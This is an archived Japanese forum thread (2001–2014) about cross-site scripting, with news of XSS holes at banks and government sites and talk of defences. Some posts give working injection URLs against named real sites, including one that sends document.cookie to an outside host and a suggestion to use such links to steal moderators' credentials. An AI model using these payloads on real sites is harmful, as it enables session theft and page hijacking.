クロスサイトスクリプティング

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
http://securit.etl.go.jp/research/paper/css2001-takagi-dist.pdf
案外対策取られてないものですね。
クライアントサイドからもサーバサイドからも両面で対策しないと
まずいですね。
皆さんはどんな対策とってますか?
WebProg板にも同じようなスレが立ったんですが、
どうしましょう?
3名無しさん@お腹いっぱい。:01/10/27 19:49
WebProg板でやる?
でもクライアント側の話はこっちじゃないかな?

ところで、「セキュリティホール memo ML」のアーカイブに
問題があるって本当?
5名無し:01/10/27 22:46
ここのArticle 1756 みてみればわかる。
http://memo.st.ryukoku.ac.jp/archive/200110.month/index.html
>>5
ほんとだ。こりゃまずいわ。しかも高木さんの投稿、10月26日
じゃん
7エスケープ無しさん:01/10/28 05:39
http://galaxy.rwcp.or.jp/
ここは本文からしてだめだね。
引用の記号見るだけでエスケープされてないのが分かる。
8名無しさん@お腹いっぱい。:01/11/01 06:00
1のPDFに書いてあったけど、
これって。。。。
http://pc.2ch.net/../<S>test</S>
APACHEが古いの?
最悪の場合トリップやキャップが漏れるね。
夜勤さんに報告したほうがいいのかな?
こんな感じでどこにでも吹っ飛ばせる。
http://pc.2ch.net/../<SCRIPT>{location.href='http://www.2ch.net/?'+document.cookie}</SCRIPT>
1211:01/11/03 22:44
エスケープするとエラー画面上でもエスケープされるから
問題ないのか
でもlocationとかで転送するという手はありそうだなあ。
で、転送URLを貼ったカキコを「エロ画像です。削除してください」
とか言って削除依頼すれば削除人のキャップを抜き放題(w
まだなおってない (`皿′)ノ age
14>11:01/11/10 13:32
http://pc.2ch.net/../%3CSCRIPT%3E{location.href=%27http://www.2ch.net/?%27+document.cookie}%3C/SCRIPT%3E

を開くと、
ページが見つかりません 
HTTP 400 - 不正な要求
Internet Explorer

となる。
15名無しさん@お腹いっぱい。:01/11/12 07:25
>>14
ネスケでやってみれ.
IEなら,インターネットオプションの詳細設定のブラウズの,
HTTPエラーメッセージを簡易表示するのチェックを外してみれ.
16>15:01/11/12 15:38
簡易表示するのチェックを外してみたところ、
Bad Request
Your browser sent a request that this server could not understand.
Invalid URI in request GET /../%3CSCRIPT%3E{location.href=%27http://www.2ch.net/?%27+document.cookie}%3C/SCRIPT%3E HTTP/1.1

となった。ネスケでは後日やってみます。
IEは5.01SP2です。
17cookieが表示されない:01/11/12 16:35
セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/
MS01-055: Cookie Data in IE Can Be Exposed or Altered Through Script Injection (セキュリティアンテナ, 2001.11.09)にあるデモ

http://www.solutions.fi/index.cgi/extra_iebug?lang=eng
でamazon.co.jpを読むと(事前にamazon.co.jpのcookieを取り込んである)
MSIE cookie vulnerability test page
This page displays the cookies found on your browser for site amazon.co.jp:
Cookies:
No cookies found for site...
Click here to make new search for cookies.
−−−−−
アクティブスクリプトに対して「プロンプトを表示」で表示されたら
はい(Y)を選択する。
こんなダイアログ−http://www.st.ryukoku.ac.jp/~kjm/security/memo/2001/ie6-script-dialog.png
−−−−−
アクティブスクリプトを実行しなければ "; document.location=url; と表示される。
−−−−−
デモが表示された後、「戻る」と
警告: ページの有効期限切れ 要求したページは、フォームで送信された情報を使用して作成されました。このページは、もう利用できません。セキュリティ保護のため、情報は自動的には再送信されません。
情報を再送信し、この Web ページを表示するには、ツール バーの [更新] ボタンをクリックしてください。 となる。
18名無しさん@お腹いっぱい。:01/11/12 19:30
19>18:01/11/12 23:36
http://pc.2ch.net/../<SCRIPT>alert('hello')</SCRIPT>

Bad Request
Your browser sent a request that this server could not understand.
Invalid URI in request GET /../%3CSCRIPT%3Ealert('hello')%3C/SCRIPT%3E HTTP/1.0
−−−−−
HTTP/1.0となっている。 16は1.1だが。
>>14
11では抜けないことは確認済み。
BBS_UNICODE=passな板なら数値文字参照を使って
クリック一発なURLを生成できた
「HTTPエラーメッセージの簡易表示」対策はしてないけど
http://teri.2ch.net/test/read.cgi/accuse/1005368156/110
22名無しさん@お腹いっぱい。:02/02/04 21:48
バカボンド age!
http://ime.nu/<script>alert('hogehoge')</script>
http://ime.nu/%3Cscript%3Ealert%28'hogehoge'%29%3C/script%3E
アゲとくか
29名無しさん@お腹いっぱい。:02/04/09 21:34
officeのタカリネタ
CSSのスレは前からあったんだね。できれば荒らされないようにsage進行キボン。
当面、銀行スレからコピペで情報もってくるかな。
クロスサイトスクリプティング脆弱性レポートページが登場(2002.3.9)

 クロスサイトスクリプティング脆弱性に関する啓蒙活動を行っている office 氏が、これまでに発見したクロス
サイトスクリプティングのうち代表的なものを紹介するページを公開した。

 このページには、マイクロソフト、楽天、ジャパンネットバンク銀行などンなど大手企業のクロスサイトスクリプ
ティング脆弱性が報告されている。


Cross Site Scripting Holes
http://www.office.ac/holes.html

(詳しくはScan および Scan Daily EXpress 本誌をご覧ください)
http://shop.vagabond.co.jp/m-ssw01.shtml
http://shop.vagabond.co.jp/m-sdx01.shtml


https://www.netsecurity.ne.jp/article/1/4278.html
みずほ銀行のWebサイトにクロスサイトスクリプティングの脆弱性

 4月1日より開業したみずほ銀行だが、相次ぐトラブルの中、あらたに同行のWebサイトに
クロスサイトスクリプティングの脆弱性が発見された。

 この問題は、クロスサイトスクリプティング問題の調査と啓蒙を行っているoffice 氏が発見
したもので、同行のインターネットバンキングサービスのログイン画面などに脆弱性が存在
している。この脆弱性を利用することにより、偽装した画面を表示すること可能で、顧客番号
や口座番号、暗証番号をリダイレクトさせることもできるなど、非常に危険な状態である。

 同行は合併に伴うシステムの移行が遅れ、挙げ句の果てにATMという基本的なシステム
が使えないと言う大失態を犯してしまうなど、トラブルが多発している。今回のクロスサイト
スクリプティングの脆弱性も、十分な検証が行われないままスタートした同行の慌てぶりを
象徴する事件であるといえよう。

 大手銀行の合併が相次いだが、きわめてクリティカルな状況におかれる銀行においては、
システムの十分な検証が何よりも重要な事項である。確かに開業日までにシステムが完成
していることは重要である。しかし、利用者が安心して使用できるシステムを作り上げること
こそが、本当に大切なことであることを、システム担当者には今一度思い出して頂きたい。

http://headlines.yahoo.co.jp/hl?a=20020403-00000010-vgb-sci
33名無しさん@お腹いっぱい。:02/04/15 22:55
ちゃんねる検索を2ちゃんねる化
http://2ch.dyn.to/cgi-bin/namazu.cgi?idxname=../<SCRIPT%20DEFER>document.body.innerHTML='<html><head><title>2%82%BF%82%E1%82%F1%82%CB%82%E9%82%D6%82%E6%82%A4%82%B1%82%BB</title>
</head><body><iframe%20src%3Dhttp://www.2ch.net/%20frameborder%3Dno%20border%3D0%20width%3D100%25%20height%3D100%25%20marginwidth%3D0%20marginheight%3D0></iframe></body></html>';</script>

一行につなげて打ち込んで
34名無しさん@お腹いっぱい。:02/04/15 23:21
東京大学が2ちゃんねる
(1行につなげてね)
http://www.utnl.gen.u-tokyo.ac.jp/cgi-bin/namazu.cgi?idxname=../<SCRIPT%20DEFER>document.body.innerHTML='<html><head>
<title>2%82%BF%82%E1%82%F1%82%CB%82%E9%82%D6%82%E6%82%A4%82%B1%82%BB</title></head><body><iframe%20src%3Dhttp://www.2ch.net/
%20frameborder%3Dno%20border%3D0%20width%3D100%25%20height%3D100%25%20marginwidth%3D0%20marginheight%3D0></iframe></body></html>';</script>

35名無しさん@お腹いっぱい。:02/04/15 23:24
http://sv2.humeco.m.u-tokyo.ac.jp/cgi-bin/namazu.cgi?idxname=../<SCRIPT%20DEFER>document.body.innerHTML='<html>
<head><title>2%82%BF%82%E1%82%F1%82%CB%82%E9%82%D6%82%E6%82%A4%82%B1%82%BB</title></head><body><iframe%20src%3D
http://www.2ch.net/%20frameborder%3Dno%20border%3D0%20width%3D100%25%20height%3D100%25%20marginwidth%3D0%20marginheight%3D0></iframe></body></html>';</script>

タイトルは body.innderHTML= じゃ変わらないね。
document.title= でどうよ。
UFJ銀行のサーバーにクロスサイトスクリプティングの脆弱性(2002.1.17)
https://www.netsecurity.ne.jp/article/1/3737.html

首相官邸のホームページにクロスサイトスクリプティングの脆弱性(2002.3.13)
https://www.netsecurity.ne.jp/article/1/4313.html

首相官邸にクロスサイトスクリプティング問題 任意のメッセージを表示可能(2002.3.14)
https://www.netsecurity.ne.jp/article/1/4337.html

警察庁、外務省、公安委員会のWebサイトにクロスサイトスクリプティング(2002.3.19)
https://www.netsecurity.ne.jp/article/1/4403.html

みずほ銀行のWebサイトにクロスサイトスクリプティングの脆弱性(2002.4.3)
https://www.netsecurity.ne.jp/article/1/4636.html

【Webサーバに起因するクロスサイトスクリプティング脆弱性(1)】(執筆:office)(2002.4.25)
https://www.netsecurity.ne.jp/article/3/4924.html
NetscapeとMozillaにローカルファイルが読み出せるセキュリティホール(2002.5.2)

 Netscape6.1以上とMozilla0.9.7以上のバージョンに、ローカルファイルが閲覧出来るという問題が
発見された。この問題は、XMLHTTPコンポーネントに存在するセキュリティホールを利用することで、
リモートからローカルファイル転送出来るという物。

 このセキュリティホールを発見したのは、イスラエルのGreyMagic Softwareで、同社は昨年の12月
にInternet Explorerでも同様の問題を発見している。マイクロソフトでは、この問題に対するパッチを
提供済みだ。

 GreyMagic社によると、この問題をNetscapeに通達しているが、Netscapeからの連絡は現在の所
無いという。なお、Netscapeでは、危険性の高いバグを発見した物に対し1,000ドルを支払うという
「Bug Bounty Program」を実施しているものの、この件に対し何の返事もないことに、GreyMagic社
はNetscapeの対応の悪さを糾弾している。

https://www.netsecurity.ne.jp/article/1/5021.html
39ヤプーニュース Scanの報道を握り潰し か?:02/05/13 18:07
https://www.netsecurity.ne.jp/article/1/5129.html
クロスサイトスクリプティング攻撃がYahoo!オークションに仕掛けられる(2002.5.13)

この記事が Yahoo!ニュースに未だ掲載されず。
http://headlines.yahoo.co.jp/hl?c=sci&t=l
>>39 ソフトバンク系の会社はいかがわしいので公正を期待してはいけない(w
ZDNet(ソフトバンクの子会社)もいつもソフトバンクの都合悪いことは
報道しないでしょ。
41名無しさん@お腹いっぱい。:02/05/13 18:40
今回はYahoo工作員になってやろう。

こんなのクロスサイトスクリプティングじゃねーだろ。
オヒイスが無知を糊塗するために広義のクロスサイトスクリプティングなどとごまかしたもんだから墓穴を掘ることになった。
ユーザが外部からスクリプト持ち込めるホストは全部脆弱性があるとでも言うつもりだろうか? めでてーな。ゲラゲラ
43名無しさん@お腹いっぱい。:02/05/13 18:58
>>41
Yahoo Auction は、クッキー盗まれたらヤバイだろ。
証明して欲しいのか?>工作員
44名無しさん@お腹いっぱい。:02/05/13 19:44
まさかクッキー値だけで認証してるとでも。 ゲラゲラ
Yahoo Japanはへっぽこだが本家Yahoo Inc.はそのくらいの技術力は持ってるぞ。
クッキーは同一IPアドレスに対して有効。(その他も見てるかも)
45名無しさん@お腹いっぱい。:02/05/13 21:39
44 が本物の工作員なら困ったことだな。
同一IPのチェックしてれば問題ないとでも?
ケーブル民はどうなってもいいのか。
つーか、同一IPチェックしてたら企業ユーザが使えなくなる。
46名無しさん@お腹いっぱい。:02/05/13 21:40
>>45
それだけやっても抜けるのは登録メアド、登録してあれば名前,住所等個人情報(登録はオプション)。
自己紹介と登録メアドは悪戯できるな。
48名無しさん@お腹いっぱい。:02/05/13 22:27
他人の垢で入札したり、他人の入札をキャンセルしたりできるんでねーの?
入札のときはパスワードいるだろ。キャンセルはわからん。
50michimi:02/05/26 10:42
メールアドレスを変更して、そのアドレスにパスワード送らせることができる。
ただし、母親の旧姓だの、ペットの名前だのが必要になるが。
「旅の窓口」mytrip.net にクロスサイトスクリプティング脆弱性(2002.6.3)

 宿泊情報・観光情報、予約サービスを提供する「旅の窓口」mytrip.net にクロス
サイトスクリプティング脆弱性が発見された。

 この問題により、Cookie情報の取得や悪意のあるページを作成することが可能に
なっていた。しかし、幸いなことに同サイトではCookie情報を利用していたが、現在
Cookieだけで認証は行っていないため、悪用される危険性は無かったようだ。

 同サイトでは、クロスサイトスクリプティングに対する脆弱性を修正するとともに、
「 < 」「 > 」などといった特殊文字を、予約情報や掲示板などのサイト内で入力可
能な項目に使用することを禁止している。現在、これらの文字を含んだ項目を入力
しようとした場合には、警告を表示し入力を受け付けないよう、修正が施されている。

「旅の窓口」クロスサイト・スクリプティングの脆弱性について
http://www.mytrip.net/aboutcss.html

https://www.netsecurity.ne.jp/article/1/5388.html
>>52
旅窓は認証自体ヤバイだろ メアドと電話番号だぞ
なんかね、以前書いた CGI スクリプト見たん
です。そしたら、text/plain でエラーメッセー
ジ出してるじゃないですか。しかもユーザ入
力そのまま入ってるし。text/html じゃない
から平気だと思ってたんだけど。

IE だとヤヴァイらしいから、書き換えますね。
ヤレヤレ…
ローカル HTML リソースに存在するクロスサイト スクリプティングの脆弱性。
カスケード スタイル シートのサポートを提供する HTML オブジェクトの使用に関連する情報の漏えいの脆弱性。
Cookie 内のスクリプト処理に関連する情報の漏えいの脆弱性。
ゾーン偽装の脆弱性。
マイクロソフト セキュリティ情報 MS01-058 で説明されている 「Content-Disposition」 の脆弱性の 2 つの変種。

概要 :
このセキュリティ情報の対象となるユーザー : MicrosoftR Internet Explorer を使用しているお客様

脆弱性の影響 : 6 つの新しい脆弱性。最も深刻な脆弱性については、攻撃者の選択したコードが
実行される可能性があります。

最大深刻度 : 高

推奨する対応策 : Internet Explorer の影響を受けるバージョンを使用しているお客様は直ちに
この修正プログラムをインストールして下さい。

影響を受けるソフトウェア :
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6


2002 年 5 月 15 日 Internet Explorer 用の累積的な修正プログラム (Q321232) (MS02-023)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-023.asp
56スミルノフ:02/06/27 22:44
Vulnerabilities on Major Websites
http://webmail.linux-tech.com/pipermail/infosec/2002-March/000070.html
によれば

http://www.whitehouse.gov/cgi-bin/good-bye.cgi?url=<script>alert("Point+Blank+Security");</script>
がCSSだそうだが、これは現在のところ修正したのかな?効かない。
だけれど
http://www.whitehouse.gov/cgi-bin/good-bye.cgi?url=javascript:alert('Point+Blank+Security')

同じく
http://www.fbi.gov/cgi-bin/outside.cgi?<script>alert("Point+Blank+Security");</script>
がCSSだそうだが、これは現在のところ修正したのかな?効かない。
だけれど
http://www.fbi.gov/cgi-bin/outside.cgi?javascript:alert('Point+Blank+Security')

なんちゅうか、sage.
57スミルノフ:02/06/27 22:52
http://search.linuxsecurity.com/cgi-bin/htsearch?words='></title><script>alert("---")</script>
58スミルノフ:02/07/20 18:11
http://search.linuxsecurity.com/cgi-bin/htsearch?words='></title><script>alert("---")</script>
は修正されたみたい。
59age:02/08/20 21:46
age
某NHKのことかな?
61名無しさん@お腹いっぱい。:02/08/20 23:54
某って言うな某って!
棒なら僕の菊穴に入ってるよ、太いやつが・・(ハアハア・・
Googleの「巨人 村田」バグの謎は解けたんでしょうか?
63名無しさん@お腹いっぱい。:02/09/03 19:12
あげ
64砂漠の秘密都市:02/09/08 16:18

IEを使って次の問いに答えよ。
設問:次の二つのURLでの挙動の違いとは何か?
ttp://sunsolve.sun.com/<p/style=background-image:url(javascript:document.URL=document.URL)>
ttp://sunsolve.sun.com/<script>document.URL=document.URL;</script>
65age:02/10/18 21:09
age
>>64 は何?
67名無しさん@お腹いっぱい。:02/10/26 16:36
とっても便利
どこからでもメールが送れる
http://www2u.biglobe.ne.jp/~ira/mail.cgi
68名無しさん@お腹いっぱい。:02/10/26 16:40
>>67
スレとの関係がわからんが、怖くて使えんよ。
>>70
単なるメアド収集なので通報しておきました
72名無しさん@お腹いっぱい。:02/10/27 20:02
>>71
どこに?
通報しますたにマジレスする香具師がいるとは思わなんだ
74名無しさん@お腹いっぱい。:02/11/18 02:33
[memo:4996] 愛知県避難所支援システムの XSS 脆弱性
75age:03/01/04 20:20
age
76山崎渉:03/01/15 15:47
(^^)
77age:03/03/19 10:39
age
78(´-ω-`):03/03/19 10:47
79(´-ω-`) :03/03/19 16:02
>>78
見たよ〜
80山崎渉:03/04/17 12:18
(^^)
81山崎渉:03/04/20 06:15
   ∧_∧
  (  ^^ )< ぬるぽ(^^)
82山崎渉:03/05/22 02:19
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
83山崎 渉:03/07/15 11:19

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ
85山崎 渉:03/08/15 23:24
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン
86名無しさん@お腹いっぱい。:03/10/03 21:19
今でもCSSなんて残ってるの?
だから古いスレ上げるなバカ
88名無しさん@お腹いっぱい。:03/10/03 22:59
>>87
話題が無いなら黙ってれば?
8988:03/10/03 23:09
私はsageもできないバカです。
>>88
低脳は黙ってろクズ
91名無しさん@お腹いっぱい。:03/10/04 00:33
馬鹿どもを晒しage
93名無しさん@お腹いっぱい。:03/10/19 18:40
今日の情報セキュリティ試験でXSSが出て来た…
94名無しさん@お腹いっぱい。:03/10/19 22:37
>>93
Webブラウザからのリクエストに対してWebサーバが返すWebコンテンツ中に
[ b ]が存在した場合には,それらに対するエスケープ処理をWebサーバが
実施しなければならないといったことがあります。

bに相当するのは普通「スクリプト」だと思うんだが、解答群に無かったよな。
95名無しさん@お腹いっぱい。:03/10/19 23:44
>>94
メタキャラクタでいいんじゃない?
要は不等号をタグとして扱わなければいい訳だし。
9695:03/10/20 07:16
>>95
うん。漏れもメタキャラクタにしたんだけどXSS対策に限定すると
何か回答としてはイマイチだなぁと。
97名無しさん@お腹いっぱい。:03/10/27 21:29
総務省お抱えのcrowechizekはFlash,HTML両バージョンともダメダメ。
Flashでは応答返ってこないし、HTMLでは文字大きくなるし。
"<H1>No medicine can cure a fool</H1>
98名無しさん@お腹いっぱい。:03/10/28 22:43
↑IIS?
99名無しさん@お腹いっぱい。:03/10/30 10:56
> Webブラウザからのリクエストに対してWebサーバが返すWebコンテンツ中に

リクエストに対して返すコンテンツ中のメタキャラクタを全部エスケープしち
まったら、HTMLが全部ソースで見えちまうだろ。大丈夫か、その試験。
>>94
スクリプト を エスケープする とは言わない。
エスケープする対象として日本語的に適切な選択肢を選べば回答できる。

他にはどんな選択肢があったの?
101名無しさん@お腹いっぱい。:04/01/07 12:29
最近話題にもならなくなったな
102名無しさん@お腹いっぱい。:04/02/04 00:16
クッキーで個人情報を保存するのはどう?
↓使ってみようかと思ってますが大丈夫でしょうか
ttp://resume.meieki.com/
103名無しさん@お腹いっぱい。:04/02/04 00:32
URLにスクリプト仕込むのはTHEBBSの人たちが既にやってる
http://hack.dot.thebbs.jp/1068805016.html
JavascriptをいったんString.fromCharCode化してしまえば
全タグ有効っつーかなんでもできるらしい
104名無しさん@お腹いっぱい。:04/04/11 21:36
ぱおぱおクッキー
105名無しさん@お腹いっぱい。:04/04/11 23:30
2chにもクロスサイトスクリプティング脆弱性は結構あるよ。
106名無しさん@お腹いっぱい。:04/04/12 08:53
言うだけなら誰でも出来る罠
>>106
実際にやるとどこかのおバカさんみたいに
ムショに連行される罠w
108名無しさん@お腹いっぱい。:04/04/12 13:29
と言い訳をして具体例も挙げられない馬鹿もいるようで。
>>107
俺はハッカーだから鯖落としたりできるぜ! でも捕まるからやらない

ってな。捕まらないようにできない奴は単なる厨房
足跡ベタベタ残してならF5押してる馬鹿と同じ
最近落ち着いた?
111名無しさん@お腹いっぱい。:04/09/16 16:51:06
みたいだね
112名無しさん@お腹いっぱい。:04/10/18 10:27:10
懐かしいね
113名無しさん@お腹いっぱい。:04/11/19 17:45:06
想定される被害で考えたらXSSは「だからなに?」って程度のもんだよ。
Phishingに使われちゃうとかだろうな、今だと。
あとあれか、「XSSほっといてるってコトは他にも穴がバンバンあるだろうーな」
「この会社はセキュリティ対策してねーな」って思われちゃう位だろうか。

115名無しさん@お腹いっぱい。:2005/05/19(木) 16:29:50
質問させてください。
クロスサイトスクリプティングに関して、概要や対策を紹介したページは多々あるんですが、
実際自分のWEBサイトが攻撃の踏み台にされたかどうかの確認する方法ってあるんでしょうか?
つまりWEBサイト上に形跡が残るものかどうかということを知りたいです。
116名無しさん@お腹いっぱい。:2005/07/08(金) 16:40:25
あっそ
117名無しさん@お腹いっぱい。:2005/07/24(日) 15:08:01
ネクラヒッキーのみんなー
夏は出会いの季節!夏を盛り上げる為にも、ココで女の子と出会って仲良くなろう♪
http://www.pretty-love.com/de.php

118名無しさん@お腹いっぱい。:2005/08/03(水) 00:00:59
●..●...●●...●●●●...●●.....●.●●.●..●.●●●....●●●...●.●.●●

ウイルス対策ソフトの検出力結果
http://www.geocities.jp/stealrush/security.html

●●..●..●●.●●....●.●●.●.●●●●●..●.●●●...●..●●.●....●●
119名無しさん@お腹いっぱい。:2006/06/03(土) 15:48:50
先日、中国人らしいハッカーにVNCの脆弱性をりようされ
PCに進入を許してしまいました。
これは、ハッカーがIEの履歴に残していったEXEなんですが
http://mysky.6600.org/yx/gz.exe
偉い方、なにをするものか教えてください
120名無しさん@お腹いっぱい。:2007/04/05(木) 16:35:01
ttp://hyocom.jp/b_search.php
ここのキーワード検索は、XSSなんでしょうか?
121名無しさん@お腹いっぱい。:2007/11/04(日) 11:30:26
ttp://www.brooks.co.jp/index.php

ヤバイなこのサイト・・・
122名無しさん@お腹いっぱい。:2008/06/03(火) 21:25:27
>>119
メール送信ワームが作成する圧縮ユーティリティ
ワームが自分自身を圧縮してKellyOsbourne.com.gzという
ファイルを作るためのもの。
早い話がワームがすでに実行されたことを意味するよ。
123名無しさん@お腹いっぱい。:2008/06/05(木) 00:12:08
2年物の自演てすごいよな
124名無しさん@お腹いっぱい。:2009/04/05(日) 21:36:40
125名無しさん@お腹いっぱい。:2009/06/12(金) 03:34:55
126名無しさん@お腹いっぱい。:2009/06/12(金) 03:35:14
127名無しさん@お腹いっぱい。:2010/09/05(日) 10:10:20
うーん
128ひみつの検疫さん:2024/07/24(水) 21:08:19 ID:MarkedRes
汚染を除去しました。
129 忍法帖【Lv=40,xxxPT】(5+0:8) 【29.4m】 電脳プリオン ◆3YKmpu7JR7Ic :2013/01/09(水) 22:34:04.13 BE:304056656-PLT(12079)
  ∧_∧
  ( ・∀・)   | | ガッ
 と    )    | |
   Y /ノ    人
    / )    <  >__Λ∩
  _/し' //. V`Д´)/ ←>>81
 (_フ彡        /
130 忍法帖【Lv=3,xxxP】(1+0:8) :2013/01/11(金) 02:49:36.70
test
131名無しさん@お腹いっぱい。:2013/01/24(木) 21:26:51.65
過疎スレがこんなところにも。
132名無しさん@お腹いっぱい。:2013/02/09(土) 00:06:11.18
タグを使えないネトゲのマイページのプロフィール欄に
外部のブログパーツのスクリプトを引っ張ってきたいのですが、
どのようにやればいいのでしょうか。
ご教示いただけますか?

ほかの人のやっているののソースを見ると、
アンカーが二重<<>>になっているだけのようなのですが
それで書き込んでもはじかれてしまいます。

しらべてみて、文字コードによるハック?ということまでたどりついたのですが
実際のやり方がわかりません。

詳しい方おしえてください。よろしくお願いします。
133名無しさん@お腹いっぱい。:2013/10/19(土) 22:46:39.70
<script>alert(1);</script>
<script>alert("a");</script>
>>javascript:alert(1)
134名無しさん@お腹いっぱい。:2013/10/19(土) 22:47:43.23
>>1javascript:alert(1)
135名無しさん@お腹いっぱい。:2013/10/19(土) 22:49:48.21
136名無しさん@お腹いっぱい。:2013/10/19(土) 22:55:12.82
onmouseover='alert(1)'
137名無しさん@お腹いっぱい。:2013/10/19(土) 22:56:16.74
onmouseover=alert(1)//
138名無しさん@お腹いっぱい。:2013/10/20(日) 06:48:52.86
" onmouseover="alert(1)
139名無しさん@お腹いっぱい。:2013/12/22(日) 01:29:23.82
test
<iframe style='display:none'><script>alert(1)</script></iframe>
140javascript:alert(8):2014/07/19(土) 22:32:41.10
'>"><hr>
141名無しさん@お腹いっぱい。
そりゃそうだ